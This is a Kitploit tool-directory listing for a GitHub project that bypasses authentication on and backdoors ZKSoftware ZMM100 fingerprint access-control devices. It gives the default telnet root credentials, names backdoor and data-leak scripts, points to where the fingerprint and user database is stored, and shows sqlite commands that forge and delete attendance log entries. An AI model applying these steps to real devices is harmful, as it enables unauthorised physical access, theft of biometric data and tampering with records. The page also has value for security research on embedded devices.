Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Backdooring-ZMM100-FingerPrint-Devices — AuthBypass & Auto Backdooring von Geräten | Kitploit
Tools/GitHubGitHub/9aylas/backdooring-zmm100-fingerprint-devices
Authentifizierung & AutorisierungEmbedded-System-SicherheitPasswortangriffeExploitationHardware-HackingRemote-Access-ToolDatenbanksicherheit
GitHub9aylas/backdooring-zmm100-fingerprint-devices

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Backdooring-ZMM100-FingerPrint-Devices

AuthBypass & Auto Backdooring von Geräten

Repository anzeigen
164vor 7 JahrenNoch nicht geprüft

Hacking eingebetteter Geräte :

root@kitploit:~
Hardware platform ZMM100 :
The fingerprint access control device Made by ZKSoftware.
    • Standardbenutzer/-passwort : root:solokey
  • Protokoll : Telnet (23).

Skripte :

  • pwnit.py : Automatisiertes Tool zum Hacken von Geräten.
  • hell : zweite Hintertür.
  • leak-data.sh : dritte Hintertür.

YouTube-Video :

Alternativtext des Bildes https://www.youtube.com/watch?v=Zd1N0CbvR0k

Root-Passwort ändern :

root@kitploit:~
passwd
{ enter new root password }
cp /etc/passwd /mnt/mtdblock
cp /etc/passwd /mnt/mtdblock/data/

Weitere Informationen :

root@kitploit:~
This directory "mnt/ramdisk" contains : picture.jpg , finger.bmp.
Web directory  "/mnt/mtdblock/service/webserver" contains : some shitty csl web files lol.
Database here : "/mnt/mtdblock/data/ZKDB.db"
Important tables : "ATT_LOGS" ( user logs ) , "USER_INFO" ( user informations ) , "fptemplate10"  ( finger print data ).
-- https://i.imgur.com/yNfVNSH.png ( ATT_LOGS ).
-- https://i.imgur.com/ujiIqzf.png ( USER_INFO ).
-- https://i.imgur.com/ilGwFZB.png ( fptemplate10 ).

> https://github.com/adrobinoga/zk-protocol/blob/master/sections/data-user.md#example-of-a-template-entry
SQLite ELF File : "/mnt/mtdblock/data/sqlite3_arm" --> ./sqlite3_arm ZKDB.db;

Einfügen / Daten löschen :

  • Einfügen : ./sqlite3_arm ZKDB.db "INSERT INTO ATT_LOG VALUES (null,1224,15,'2019-04-12T00:00:00','0','0',null,null,null,null,0);"

  • Protokolleintrag löschen : ./sqlite3_arm ZKDB.db "DELETE FROM ATT_LOG WHERE ID = 1224;"

Shit, es ist erstaunlich 3:) !

Referenzen :

https://blog.infobytesec.com/2014/07/perverting-embedded-devices-zksoftware_2920.html https://github.com/linsir/pyscripts/tree/master/zkteco_check_in

Tool herunterladen